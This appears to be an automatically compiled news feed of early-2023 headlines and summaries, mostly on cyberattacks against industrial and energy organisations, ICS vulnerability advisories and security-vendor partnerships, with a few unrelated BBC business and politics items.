    Autosummary: “We are excited to announce this integration with Sumo Logic to arm security teams with an open, API-based solution to detect, disarm and respond to relevant threats,” Srinivasan added. "

    ---

    Brazil riots: Jair Bolsonaro ordered to testify by Supreme Court

    latam industry
    2023-04-14 https://www.bbc.co.uk/news/world-latin-america-65282559?at_medium=RSS&at_campaign=KARANGA
    Prosecutors say the ex-president incited riots by questioning the legitimacy of an election. "

    Autosummary: "

    ---

    Lazarus Hacker Group Evolves Tactics, Tools, and Targets in DeathNote Campaign

    industry
    2023-04-13 https://thehackernews.com/2023/04/lazarus-hacker-group-evolves-tactics.html
    The North Korean threat actor known as the Lazarus Group has been observed shifting its focus and rapidly evolving its tools and tactics as part of a long-running activity called DeathNote. While the nation-state adversary is known for its persistent attacks on the cryptocurrency sector, it has also targeted automotive, academic, and defense sectors in Eastern Europe and other parts of the world "

    Autosummary: While the nation-state adversary is known for its persistent attacks on the cryptocurrency sector, it has also targeted automotive, academic, and defense sectors in Eastern Europe and other parts of the world, in what"s perceived as a "significant" pivot. "

    ---

    Fortinet fixed a critical vulnerability in its Data Analytics product

    exploits industry
    2023-04-13 https://securityaffairs.com/144750/security/fortinet-critical-vulnerability-data-analytics.html
    

    Fortinet addressed a critical vulnerability that can lead to remote, unauthenticated access to Redis and MongoDB instances. Fortinet has addressed a critical vulnerability, tracked as CVE-2022-41331 (CVSS score of 9.3), in its Fortinet FortiPresence data analytics solution. FortiPresence is a comprehensive data analytics solution designed for analyzing user traffic and deriving usage patterns. Successful exploitation can […]

    The post Fortinet fixed a critical vulnerability in its Data Analytics product appeared first on Security Affairs.

    "

    Autosummary: "

    ---

    SentinelOne announces integration of firewalls and NDR capabilities with key industry players

    industry
    2023-04-13 https://www.helpnetsecurity.com/2023/04/14/sentinelone-ndr-capabilities/
    

    SentinelOne has unveiled integrations with key industry players Aruba, Checkpoint, Cisco, Darktrace, Extrahop, Fortinet, Palo Alto Networks and an enhanced collaboration with Vectra AI which expand the company’s firewall and NDR capabilities, and will allow organizations of all sizes to gain the insights they need to rapidly identify and respond to attacks across all vectors. “The integration of firewalls and NDR capabilities perfectly complements our XDR solutions,” said Akhil Kapoor, VP, Technology Partnerships, SentinelOne. “In … More →

    The post SentinelOne announces integration of firewalls and NDR capabilities with key industry players appeared first on Help Net Security.

    "

    Autosummary: SentinelOne has unveiled integrations with key industry players Aruba, Checkpoint, Cisco, Darktrace, Extrahop, Fortinet, Palo Alto Networks and an enhanced collaboration with Vectra AI which expand the company’s firewall and NDR capabilities, and will allow organizations of all sizes to gain the insights they need to rapidly identify and respond to attacks across all vectors. "

    ---

    DirectDefense and Claroty join forces to secure XIoT environments

    industry
    2023-04-13 https://www.helpnetsecurity.com/2023/04/14/directdefense-claroty/
    

    DirectDefense has partnered with Claroty which empowers organizations with visibility, protection, and threat detection to secure their Extended Internet of Things (XIoT), a vast network of cyber-physical systems across industrial, healthcare, and commercial environments. As digital transformation efforts have intensified over the last decade, a broad range of XIoT assets – including operational technology (OT), the Internet of Medical Things (IoMT), building management systems (BMS) and enterprise IoT – are now interconnected. While this drives … More →

    The post DirectDefense and Claroty join forces to secure XIoT environments appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    Elon Musk: Tesla to build new battery factory in Shanghai

    industry
    2023-04-10 https://www.bbc.co.uk/news/business-65228927?at_medium=RSS&at_campaign=KARANGA
    Elon Musk"s company says the plant will be able to produce 10,000 "Megapack" battery units a year. "

    Autosummary: "

    ---

    Estonian National Charged in U.S. for Acquiring Electronics and Metasploit Pro for Russian Military

    industry rusia-ucrania
    2023-04-10 https://thehackernews.com/2023/04/estonian-national-charged-in-us-for.html
    An Estonian national has been charged in the U.S. for purchasing U.S.-made electronics on behalf of the Russian government and military. The 45-year-old individual, Andrey Shevlyakov, was arrested on March 28, 2023, in Tallinn. He has been indicted with 18 counts of conspiracy and other charges. If found guilty, he faces up to 20 years in prison. Court documents allege that Shevlyakov operated "

    Autosummary: "

    ---

    Estonian National charged with helping Russia acquire U.S. hacking tools and electronics

    industry
    2023-04-09 https://securityaffairs.com/144567/cyber-crime/estonian-national-helped-russia-acquire-us-electronics.html
    

    Andrey Shevlyakov, an Estonian national, was charged in the US with conspiracy and other charges related to acquiring U.S.-made electronics on behalf of the Russian government and military. The Estonian man is accused of having helped the Russian government and military to purchase US-made electronics and hacking tools. The defendant was arrested in Estonia on […]

    The post Estonian National charged with helping Russia acquire U.S. hacking tools and electronics appeared first on Security Affairs.

    "

    Autosummary: Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Estonian National) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "

    ---

    CISA Warns of Critical ICS Flaws in Hitachi, mySCADA, ICL, and Nexx Products

    industry
    2023-04-07 https://thehackernews.com/2023/04/cisa-warns-of-critical-ics-flaws-in.html
    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has published eight Industrial Control Systems (ICS) advisories warning of critical flaws affecting products from Hitachi Energy, mySCADA Technologies, Industrial Control Links, and Nexx. Topping the list is CVE-2022-3682 (CVSS score: 9.9), impacting Hitachi Energy"s MicroSCADA System Data Manager SDM600 that could allow an "

    Autosummary: The following versions of Nexx smart home devices are affected - Nexx Garage Door Controller (NXG-100B, NXG-200) - Version nxg200v-p3-4-1 and prior Nexx Smart Plug (NXPG-100W) - Version nxpg100cv4-0-0 and prior Nexx Smart Alarm (NXAL-100) - Version nxal100v-p1-9-1and prior "Successful exploitation of these vulnerabilities could allow an attacker to receive sensitive information, execute application programmable interface (API) requests, or hijack devices," CISA said. "

    ---

    Industrial Defender launches Phoenix to secure SMBs operations

    industry
    2023-04-06 https://www.helpnetsecurity.com/2023/04/06/industrial-defender-phoenix/
    

    Industrial Defender has unveiled the launch of Phoenix, an OT security solution tailored to the needs of SMBs. Phoenix is revolutionizing how smaller industrial organizations approach OT security by providing visibility into all their OT assets and their associated cyber risks. By providing a solution that is easy to deploy and cost-effective, Phoenix enables SMBs to overcome resource barriers and secure their operations effectively. “From ransomware campaigns to nation-state attacks, cyber threats against industrial organizations … More →

    The post Industrial Defender launches Phoenix to secure SMBs operations appeared first on Help Net Security.

    "

    Autosummary: Suited for environments with up to 200 endpoints, Phoenix provides a quick, automated view of all OT assets and vital endpoint information including: Device type, make, model and serial number Software and firmware User accounts Ports and services Configuration details Phoenix provides a quick on-ramp to asset discovery by monitoring network communication. "

    ---

    IoT garage door exploit allows for remote opening attack

    exploits industry
    2023-04-06 https://www.malwarebytes.com/blog/news/2023/04/iot-garage-door-exploit-allows-for-remote-opening-attack
    

    Categories: News Tags: IoT Tags: garage Tags: door Tags: remote Tags: open Tags: app Tags: switch Tags: alarm Tags: Nexx Multiple exploits are impacting a line of smart products for the home. (Read more...)

    The post IoT garage door exploit allows for remote opening attack appeared first on Malwarebytes Labs.

    "

    Autosummary: If you have devices and apps being used to power your home, alarms, doors, windows, or anything else, now is the time to check if those passwords are hard coded. From the CISA mitigations page, which doesn’t go quite as far as Sabetan’s advice to remove all of the Nexx products from your home or place of business: Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the Internet. "

    ---

    CISA JCDC Will Focus on Energy Sector

    industry
    2023-04-05 https://securityaffairs.com/144466/security/cisa-jddc-energy-sector.html
    

    The CISA ‘s Joint Cyber Defense Collective (JCDC) initiative is going to build operation plans for protecting and responding to cyber threats. What comes to mind when you think of cyber criminals? Depending on who you ask, you’ll get a variety of answers. For some, a cyber criminal matches some of the Hollywood tropes: a […]

    The post CISA JCDC Will Focus on Energy Sector appeared first on Security Affairs.

    "

    Autosummary: Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, CISA) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On About the Author: Michael Sanchez, CEO (CISA), has over 35 years of experience in information technology, cybersecurity, physical security, risk, compliance, and audit. "

    ---

    Jair Bolsonaro returning to Brazil for first time since 8 January riots

    latam industry
    2023-03-30 https://www.bbc.co.uk/news/world-latin-america-65120313?at_medium=RSS&at_campaign=KARANGA
    The far-right ex-leader has not been home since supporters stormed government buildings in January. "

    Autosummary: "

    ---

    The rise of biometrics and decentralized identity is a game-changer for identity verification

    industry
    2023-03-30 https://www.helpnetsecurity.com/2023/03/30/biometrics-decentralized-identity-verification-video/
    

    The journey towards digital transformation for organizations and governments has been fraught with difficulties, resulting in some users needing to catch up as more digital services are introduced. In this Help Net Security video, Jenn Markey, VP of Payments and Identities at Entrust, talks about how biometrics, hybrid solutions, and decentralized identity are transforming the industry and the future of identity verification. Digital identity is a rapidly evolving space, with the market expected to reach … More →

    The post The rise of biometrics and decentralized identity is a game-changer for identity verification appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    Cynerio and Sodexo join forces to address growing threats to medical IoT devices

    industry
    2023-03-30 https://www.helpnetsecurity.com/2023/03/31/cynerio-sodexo/
    

    Cynerio has formed a partnership with Sodexo to provide hospitals and healthcare systems with visibility into their IoMT footprint that allows for the immediate remediation of identified threats through step-by-step mitigation recommendations for each attack and risk. The Cynerio partnership with Sodexo HTM provides healthcare organizations with the threat intelligence they need to compile a precise inventory of all network-connected medical and enterprise IoT devices on the network. This inventory is then evaluated for potential … More →

    The post Cynerio and Sodexo join forces to address growing threats to medical IoT devices appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    What the food and building industry can teach us about securing embedded systems

    industry
    2023-03-28 https://www.helpnetsecurity.com/2023/03/28/adam-boulton-securing-embedded-systems/
    

    As one of the leading experts in product security with over 15 years of experience in security engineering and 120 cybersecurity patents under his belt, Adam Boulton is one of the most experienced software security professionals in the industry. Currently the SVP of Security Technology and Innovation at Cybellum, the Left to Our Own Devices podcast invited Adam Boulton to share his experience and his tips on building a product security strategy. Adam didn’t expect … More →

    The post What the food and building industry can teach us about securing embedded systems appeared first on Help Net Security.

    "

    Autosummary: For years, he was involved in typical security-critical systems: web applications, mobile applications, source code reviews, without any real exposure to embedded devices. In addition, Adam warns, “There are tons of non-functional requirements, such as hardening requirements that you cannot check because they don’t exist at a source code level. How product teams can secure a budget in 2023 Adam shared a few practical tips on how product teams can secure a budget in a difficult economy: Understand the business – CEOs aren’t interested in CVEs and CVSS scores, no matter how passionate you are. “For large products, for example, like an infotainment system, a modern one has more than 140,000 files on there, right? Developing a quality software security strategy – with metrics and KPIs Calling upon his experience, Adam shared strategies and KPIs that can be used by C-level executives to track and measure the ROI of product security. "

    ---

    Bitter APT group targets China’s nuclear energy sector

    industry
    2023-03-28 https://securityaffairs.com/144144/apt/bitter-apt-china-nuclear-sector.html
    

    Intezer researchers reported that a South Asian espionage group, tracked as Bitter, is targeting the Chinese nuclear energy industry. Intezer researchers uncovered a cyberespionage campaign targeting the Chinese nuclear energy sector, they linked it to the Bitter APT group. The Bitter APT group is a South Asian cyberespionage group active since at least 2021. The group […]

    The post Bitter APT group targets China’s nuclear energy sector  appeared first on Security Affairs.

    "

    Autosummary: Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Bitter APT) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "

    ---

    FBI: Business email compromise tactics used to defraud U.S. vendors

    industry
    2023-03-26 https://www.bleepingcomputer.com/news/security/fbi-business-email-compromise-tactics-used-to-defraud-us-vendors/
    The Federal Bureau of Investigation is warning companies in the U.S. of threat actors using tactics similar to business email compromise that allow less technical actors to steal various goods from vendors. [...] "

    Autosummary: "

    ---

    APT attacks on industrial organizations in H2 2022

    industry
    2023-03-24 https://ics-cert.kaspersky.com/publications/apt-attacks-on-industrial-organizations-in-h2-2022/
    This summary provides an overview of APT attacks on industrial enterprises and activity of groups that have been observed attacking industrial organizations and critical infrastructure facilities. "

    Autosummary: According to KSN telemetry, DTrack activity has been detected in Brazil, Germany, India, Italy, Mexico, Saudi Arabia, Switzerland, Turkey, and the United States, indicating that DTrack is being distributed into more parts of the world. CISA alerts Iran-backed APT actors CISA (Cybersecurity and Infrastructure Security Agency), the FBI, the NSA (National Security Agency), U.S. Cyber Command (USCC) – Cyber National Mission Force (CNMF), the Department of the Treasury (Treasury) have released a joint advisory, which warns of APT actors affiliated with the Islamic Revolutionary Guard Corps (IRGC) of Iran targeting a broad range of entities, including entities across multiple U.S. critical infrastructure sectors.Once access had been acquired, the operators deployed multiple publicly available tools for reconnaissance, including Mimikatz, EarthWorm, ReGeorg, and NBTscan, and then deployed their custom implants: a first-stage loader, followed by a second stage .NET loader (PNGLoad). POLONIUM’s toolset consists of seven custom backdoors: CreepyDrive, which abuses OneDrive and Dropbox cloud services for C&C; CreepySnail, which executes commands received from the attackers’ own infrastructure; DeepCreep and MegaCreep, which make use of Dropbox and Mega file storage services, respectively; and FlipCreep, TechnoCreep, and PapaCreep, which receive commands from attackers’ servers.The attack targeted over a dozen organizations, including industrial plants, design bureaus and research institutes, government agencies, ministries and departments in several East European countries (Belarus, Russia, and Ukraine), as well as Afghanistan.The targets include organizations in the engineering, IT, law, communications, branding and marketing, media, insurance, and social services sectors.The payloads used include information stealers, keyloggers, PowerSploit scripts, PlugX/Korplug, Trochilus RAT, QuasarRAT, publicly available tools, etc. In its first wave of attacks, the threat actor, which has been dubbed Earth Longzhi, targeted government organizations, infrastructure companies, and healthcare companies in Taiwan, as well as Chinese banks.In the new series of attacks, the attackers used six different backdoors (PortDoor, nccTrojan, Cotx, DNSep, Logtu, and CotSam) at the same time – probably to set up redundant communication channels with infected systems in case one of the malicious programs was removed by an antivirus solution. Cloud Atlas/Inception attacks Researchers at CheckPoint have observed Cloud Atlas (aka Inception) campaigns focused on very specific targets in Belarus, mainly in the country’s transportation and military radio-electronics sectors, and in Russia, including the government sector, energy and metal industries, since June 2022.Microsoft experts have observed activity targeting employees in organizations across multiple industries, including media, defense and aerospace, and IT services in the USA, UK, India, and Russia. "

    ---

    "Bitter" espionage hackers target Chinese nuclear energy orgs

    industry
    2023-03-24 https://www.bleepingcomputer.com/news/security/bitter-espionage-hackers-target-chinese-nuclear-energy-orgs/
    A cyberespionage hacking group tracked as "Bitter APT" was recently seen targeting the Chinese nuclear energy industry using phishing emails to infect devices with malware downloaders. [...] "

    Autosummary: Empty MSI payloads (Intezer) Intezer"s analysts could not retrieve any actual payloads delivered in this campaign but hypothesized that they might include keyloggers, RATs (remote access tools), and info-stealers. "

    ---

    German and South Korean Agencies Warn of Kimsuky"s Expanding Cyber Attack Tactics

    industry
    2023-03-23 https://thehackernews.com/2023/03/german-and-south-korean-agencies-warn.html
    German and South Korean government agencies have warned about cyber attacks mounted by a threat actor tracked as Kimsuky using rogue browser extensions to steal users" Gmail inboxes. The joint advisory comes from Germany"s domestic intelligence apparatus, the Federal Office for the Protection of the Constitution (BfV), and South Korea"s National Intelligence Service of the Republic of Korea (NIS "

    Autosummary: "This threat actor"s activities include collecting financial, personal, and client data specifically from academic, manufacturing, and national security industries in South Korea," Google-owned threat intelligence firm Mandiant disclosed last year. "

    ---

    CISA Alerts on Critical Security Vulnerabilities in Industrial Control Systems

    industry
    2023-03-22 https://thehackernews.com/2023/03/cisa-alerts-on-critical-security.html
    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has released eight Industrial Control Systems (ICS) advisories on Tuesday, warning of critical flaws affecting equipment from Delta Electronics and Rockwell Automation. This includes 13 security vulnerabilities in Delta Electronics" InfraSuite Device Master, a real-time device monitoring software. All versions prior to 1.0.5 are "

    Autosummary: Another set of vulnerabilities relates to Rockwell Automation"s ThinManager ThinServer and affects the following versions of the thin client and remote desktop protocol (RDP) server management software - 6.x – 10.x 11.0.0 – 11.0.5 11.1.0 – 11.1.5 11.2.0 – 11.2.6 12.0.0 – 12.0.4 12.1.0 – 12.1.5, and 13.0.0 – 13.0.1 The most severe of the issues are two path traversal flaw tracked as CVE-2023-28755 (CVSS score: 9.8) and CVE-2023-28756 (CVSS score: 7.5) that could permit an unauthenticated remote attacker to upload arbitrary files to the directory where the ThinServer.exe is installed. "

    ---

    The revolution underway in India"s diamond industry

    industry
    2023-03-17 https://www.bbc.co.uk/news/business-64783843?at_medium=RSS&at_campaign=KARANGA
    India"s long history with diamonds enters a new chapter as lab-grown versions of the gem take off. "

    Autosummary: "

    ---

    Hitachi Energy confirms data breach after Clop GoAnywhere attacks

    financial industry
    2023-03-17 https://www.bleepingcomputer.com/news/security/hitachi-energy-confirms-data-breach-after-clop-goanywhere-attacks/
    Hitachi Energy confirmed it suffered a data breach after the Clop ransomware gang stole data using a zero-day GoAnyway zero-day vulnerability. [...] "

    Autosummary: "

    ---

    Hitachi Energy breached by Clop gang through GoAnywhere Zero-Day exploitation

    exploits industry
    2023-03-17 https://securityaffairs.com/143640/data-breach/hitachi-energy-data-breach.html
    

    Hitachi Energy disclosed a data breach, the Clop ransomware gang stole the company data by exploiting the recent GoAnywhere zero-day flaw. Hitachi Energy disclosed a data breach, the company was hacked by the Clop ransomware gang that stole its data by exploiting the recently disclosed zero-day vulnerability in the GoAnywhere MFT (Managed File Transfer). The […]

    The post Hitachi Energy breached by Clop gang through GoAnywhere Zero-Day exploitation appeared first on Security Affairs.

    "

    Autosummary: Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Hitachi Energy) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "

    ---

    Banking turmoil opens opportunities for fraud – Week in security with Tony Anscombe

    financial industry
    2023-03-17 https://www.welivesecurity.com/videos/banking-turmoil-opportunities-cybercriminals-week-security-tony-anscombe/
    

    Scammers are looking to cash in on the chaos that has set in following the startling meltdowns of Silicon Valley Bank and Signature Bank and the crisis at Credit Suisse

    The post Banking turmoil opens opportunities for fraud – Week in security with Tony Anscombe appeared first on WeLiveSecurity

    "

    Autosummary: "

    ---

    What"s Wrong with Manufacturing?

    industry
    2023-03-16 https://thehackernews.com/2023/03/whats-wrong-with-manufacturing.html
    In last year"s edition of the Security Navigator we noted that the Manufacturing Industry appeared to be totally over-represented in our dataset of Cyber Extortion victims. Neither the number of businesses nor their average revenue particularly stood out to explain this. Manufacturing was also the most represented Industry in our CyberSOC dataset – contributing more Incidents than any other "

    Autosummary: We derived three metrics that facilitate somewhat normalized comparisons across the industries in our client base: VOC scanning findings per asset, time to patch, Pentest findings per day of testing. In a similar comparison, limited only to Perimeter Security, and only Medium Sized business, Manufacturing ranks 1st with the most Incidents per Customer out of 7 comparable Industries. Pentesting findings We observe that the average CVSS Per Day was 4.81, compared to 3.61 on average for clients in all other sectors in the dataset – 33% higher. We note that 58% of the Incidents this industry deals with are internally caused, 32% were externally caused, 1% was classified as "Partner" or 3rd parties. Hunting for possible explanations Manufacturing is still the most impacted industry in our Cyber Extortion dataset in 2023, as tracked by monitoring double-extortion leak sites. "

    ---

    Canonical collaborates with MediaTek to optimize Ubuntu for IoT innovations

    industry
    2023-03-15 https://www.helpnetsecurity.com/2023/03/15/canonical-mediatek/
    

    Canonical is partnering with MediaTek to meet the growing demands of the IoT industry, reduce development costs and accelerate time-to-market. By partnering to enable Ubuntu on the Genio platform, MediaTek and Canonical will make it easier for developers, innovators and the embedded community to take advantage of this power-efficient, high-performance IoT SoC. The collaboration ensures developers and enterprises can create reliable and secure devices, benefiting from up to 10 years of enterprise-grade Ubuntu support, security … More →

    The post Canonical collaborates with MediaTek to optimize Ubuntu for IoT innovations appeared first on Help Net Security.

    "

    Autosummary: Aiming to further the deployment of Arm-based solutions, Ubuntu Core, the secure, application-centric OS optimised for embedded devices, is now available on SystemReady-certified arm64 systems, with the MediaTek Genio 1200 becoming the first platform to enable Ubuntu Core on SystemReady IR. Reliable and efficient over-the-air updates With the modern proliferation of IoT devices, delivering reliable software updates to low-powered, inaccessible, and often remotely administered embedded systems is significantly challenging. "

    ---

    YoroTrooper Stealing Credentials and Information from Government and Energy Organizations

    government industry
    2023-03-15 https://thehackernews.com/2023/03/yorotrooper-stealing-credentials-and.html
    A previously undocumented threat actor dubbed YoroTrooper has been targeting government, energy, and international organizations across Europe as part of a cyber espionage campaign that has been active since at least June 2022. "Information stolen from successful compromises include credentials from multiple applications, browser histories and cookies, system information and screenshots," Cisco "

    Autosummary: "

    ---

    H2 2022 – brief overview of main incidents in industrial cybersecurity

    industry ciber
    2023-03-15 https://ics-cert.kaspersky.com/publications/h2-2022-brief-overview-of-main-incidentsin-industrial-cybersecurity/
    In this overview, we discuss cybercriminal and hacktivist attacks on industrial organizations. "

    Autosummary: Hive Ransomware The Cybersecurity and Infrastructure Security Agency (CISA), together with the Federal Bureau of Investigation (FBI) and the Department of Health and Human Services (HHS), published a joint alert about the Hive ransomware group, which targeted a wide range of businesses and infrastructure sectors, including Government Facilities, Communications, Critical Manufacturing, Information Technology, and especially Healthcare and Public Health. The ALPHV ransomware gang, aka BlackCat, claimed responsibility for the cyberattack against Creos and added it to its extortion site on Saturday, threatening to publish 180,000 stolen files totaling 150 GB in size, including contracts, agreements, passports, bills, and emails. On December 29, the LockBit ransomware gang took responsibility for the attack against the port, claiming to have stolen financial reports, audits, budgets, contracts, ship logs and other information about cargo and crews.The data leaked includes bank account details, dates of birth, next-of-kin information, national insurance numbers and tax information, health and well-being information, disciplinary and grievance related documents, etc.The attackers used known vulnerabilities (CVE-2022-24521, CVE-2020-1472), phishing, PowerShell scripts, KerberCache tool, compromised credentials and RDP to gain access, then used the Hancitor loader to drop their ransomware.From 2019 through at least June 2022, actors have used this malware to target a wide range of businesses and critical infrastructure organizations, including defense contractors, educational institutions, manufacturers, technology companies, and especially organizations in the healthcare and medical industries.According to the company’s statement, data that was unlawfully accessed potentially included personal information (including names, emails, addresses, taxpayer identification numbers, and banking information of affected individuals and businesses). U-blox U-blox, a Swiss company that creates wireless semiconductors and modules for consumer, automotive and industrial markets, said on October 28 that it had been targeted by a ransomware attack, which was detected and contained on October 24. Tata Power On October 14, the largest Indian energy company, Tata Power Company Limited, confirmed that it was targeted by a cyberattack, which affected its IT infrastructure. EPM In December, Empresas Públicas de Medellín (EPM), a Colombian energy provider, was hit with a ransomware attack, which disrupted the company’s operations and took down online services.The hackers uploaded a sample of the stolen files, including employment contracts, supplier contracts, files on various employees, documents detailing executive compensation packages, and more.Information stolen by the attackers may have included employee names, addresses, dates of birth, direct deposit information, ethnicity, and Social Security numbers. Elbit Systems Elbit Systems of America, a subsidiary of Israeli defense contractor Elbit Systems, confirmed a data breach, several months after a ransomware gang claimed to have hacked the company’s systems. The RansomEXX ransomware gang took responsibility for the “malicious cyberactivity” and for stealing 29.9GB of files pertaining to non-disclosure agreements, passports, IDs, contracts, and supply agreements. The company didn’t name the attacker, but BleepingComputer, which saw a ransom note on one of Semikron systems, reported that LV Ransomware might be behind the attack and that they claim to have stolen two terabytes of company data. Eurocell Eurocell, a UK-based PVC-U manufacturer, was hit by a cyberattack, which led to critical personal details of employees being leaked.The main targets of Cuba ransomware attacks are financial services, government, healthcare and public health, critical manufacturing, and information technology. "

    ---

    H2 2022 – brief overview of main incidents in industrial cybersecurity

    industry ciber
    2023-03-15 https://ics-cert.kaspersky.com/publications/h2-2022-brief-overview-of-main-incidents-in-industrial-cybersecurity/
    In this overview, we discuss cybercriminal and hacktivist attacks on industrial organizations. "

    Autosummary: Hive Ransomware The Cybersecurity and Infrastructure Security Agency (CISA), together with the Federal Bureau of Investigation (FBI) and the Department of Health and Human Services (HHS), published a joint alert about the Hive ransomware group, which targeted a wide range of businesses and infrastructure sectors, including Government Facilities, Communications, Critical Manufacturing, Information Technology, and especially Healthcare and Public Health. The ALPHV ransomware gang, aka BlackCat, claimed responsibility for the cyberattack against Creos and added it to its extortion site on Saturday, threatening to publish 180,000 stolen files totaling 150 GB in size, including contracts, agreements, passports, bills, and emails. On December 29, the LockBit ransomware gang took responsibility for the attack against the port, claiming to have stolen financial reports, audits, budgets, contracts, ship logs and other information about cargo and crews.The data leaked includes bank account details, dates of birth, next-of-kin information, national insurance numbers and tax information, health and well-being information, disciplinary and grievance related documents, etc.The attackers used known vulnerabilities (CVE-2022-24521, CVE-2020-1472), phishing, PowerShell scripts, KerberCache tool, compromised credentials and RDP to gain access, then used the Hancitor loader to drop their ransomware.From 2019 through at least June 2022, actors have used this malware to target a wide range of businesses and critical infrastructure organizations, including defense contractors, educational institutions, manufacturers, technology companies, and especially organizations in the healthcare and medical industries.According to the company’s statement, data that was unlawfully accessed potentially included personal information (including names, emails, addresses, taxpayer identification numbers, and banking information of affected individuals and businesses). U-blox U-blox, a Swiss company that creates wireless semiconductors and modules for consumer, automotive and industrial markets, said on October 28 that it had been targeted by a ransomware attack, which was detected and contained on October 24. Tata Power On October 14, the largest Indian energy company, Tata Power Company Limited, confirmed that it was targeted by a cyberattack, which affected its IT infrastructure. EPM In December, Empresas Públicas de Medellín (EPM), a Colombian energy provider, was hit with a ransomware attack, which disrupted the company’s operations and took down online services.The hackers uploaded a sample of the stolen files, including employment contracts, supplier contracts, files on various employees, documents detailing executive compensation packages, and more.Information stolen by the attackers may have included employee names, addresses, dates of birth, direct deposit information, ethnicity, and Social Security numbers. Elbit Systems Elbit Systems of America, a subsidiary of Israeli defense contractor Elbit Systems, confirmed a data breach, several months after a ransomware gang claimed to have hacked the company’s systems. The RansomEXX ransomware gang took responsibility for the “malicious cyberactivity” and for stealing 29.9GB of files pertaining to non-disclosure agreements, passports, IDs, contracts, and supply agreements. The company didn’t name the attacker, but BleepingComputer, which saw a ransom note on one of Semikron systems, reported that LV Ransomware might be behind the attack and that they claim to have stolen two terabytes of company data. Eurocell Eurocell, a UK-based PVC-U manufacturer, was hit by a cyberattack, which led to critical personal details of employees being leaked.The main targets of Cuba ransomware attacks are financial services, government, healthcare and public health, critical manufacturing, and information technology. "

    ---

    YoroTrooper cyberspies target CIS energy orgs, EU embassies

    industry
    2023-03-14 https://www.bleepingcomputer.com/news/security/yorotrooper-cyberspies-target-cis-energy-orgs-eu-embassies/
    A new threat actor named "YoroTrooper" has been running cyber-espionage campaigns since at least June 2022, targeting government and energy organizations in Commonwealth of Independent States (CIS) countries. [...] "

    Autosummary: Stink can collect credentials, bookmarks, and browsing data from Chrome-based browsers, while it can also snap screenshots and steal data from Filezilla, Discord, and Telegram. "

    ---

    Iranian Hackers Target Women Involved in Human Rights and Middle East Politics

    industry
    2023-03-09 https://thehackernews.com/2023/03/iranian-hackers-target-women-involved.html
    Iranian state-sponsored actors are continuing to engage in social engineering campaigns targeting researchers by impersonating a U.S. think tank. "Notably the targets in this instance were all women who are actively involved in political affairs and human rights in the Middle East region," Secureworks Counter Threat Unit (CTU) said in a report shared with The Hacker News. The cybersecurity "

    Autosummary: "The group undertakes intelligence gathering, often human focused intelligence, like extracting the contents of mailboxes, contact lists, travel plans, relationships, physical location, etc. "

    ---

    TSA tells US aviation industry to boost its cybersecurity

    industry ciber
    2023-03-09 https://www.tripwire.com/state-of-security/tsa-tells-us-aviation-industry-boost-its-cybersecurity
    The US Transportation and Security Administration (TSA) has issued new requirements for airport and aircraft operators who, they say, are facing a "persistent cybersecurity threat." Read more in my article on the Tripwire State of Security blog. "

    Autosummary: "

    ---

    XIoT risk and the vulnerability landscape

    exploits industry
    2023-03-06 https://www.helpnetsecurity.com/2023/03/06/xiot-risk-video/
    

    Recently, Claroty released its State of XIoT Security Report, which shares analyses of publicly disclosed vulnerabilities affecting operational technology (OT), internet of things (IoT) devices, and most recently, the internet of medical things (IoMT). In this Help Net Security video, Nadav Erez, VP of Data at Claroty, discuss these findings and the critical need to understand the XIoT risk and vulnerability landscape. Some of the dominant trends include: 73% of vulnerabilities uncovered are critical or … More →

    The post XIoT risk and the vulnerability landscape appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    Threat landscape for industrial automation systems. Statistics for H2 2022

    industry
    2023-03-06 https://ics-cert.kaspersky.com/publications/threat-landscape-for-industrial-automation-systems-statistics-for-h2-2022/
    The statistical data presented in the report was received from ICS computers protected by Kaspersky products that Kaspersky ICS CERT categorizes as part of the industrial infrastructure at organizations. "

    Autosummary: 2022 in numbers Parameter H1 2022 H2 2022 2022 Percentage of attacked ICS computers globally 31.8% 34.3% 40.6% Main threat sources Internet 16.5% 19.9% 24.0% Email clients 7.0% 6.4% 7.9% Removable devices 3.5% 3.8% 5.2% Network folders 0.6% 0.6% 0.8% Percentage of ICS computers on which malicious objects from different categories were blocked Malicious scripts and phishing pages (JS and HTML) 12.9% 13.5% 17.3% Denylisted internet resources 9.5% 10.1% 13.2% Spy Trojans, backdoors and keyloggers 8.6% 7.1% 9.2% Malicious documents (MSOffice+PDF) 5.5% 4.5% 6.2% Worms 2.8% 2.5% 3.5% Viruses 2.4% 2.4% 3.2% Miners – executable files for Windows 2.3% 1.5% 2.7% Web miners running in browsers 1.8% 1.8% 2.5% Malware for AutoCAD 0.6% 0.6% 0.8% Ransomware 0.6% 0.4% 0.7% Russia, H2 2022 In H2 2022, the most significant change among all countries in the percentage of ICS computers on which malicious objects were blocked was observed in Russia, where that percentage increased by 9 p.p.In H2 2022, the percentage of ICS computers on which malicious scripts and phishing pages were blocked increased: in Belarus, by 10.3 p.p., yielding 17.8% in H2 2022; in Kyrgyzstan, by 16.4 p.p., yielding 26.4% in H2 2022; in Uzbekistan, by 7.8 p.p., yielding 15.6% in H2 2022; in Kazakhstan, by 6.1 p.p., yielding 14.1% in H2 2022. Percentage of ICS computers on which malicious objects were blocked, January – December 2022 In different regions of the world, the percentage of ICS computers on which malicious activity was prevented ranged from 40.1% in Africa and Central Asia, which led the ranking, to 14.2% and 14.3%, respectively, in Western and Northern Europe, which were the most secure regions. 15 countries and territories with the highest percentage of ICS computers on which malware was blocked when removable devices were connected, H2 2022 Email clients Southern Europe, which, in H1 2022, topped the ranking of regions based on the percentage of ICS computers on which malicious email attachments and phishing links were blocked, remained at the top of the 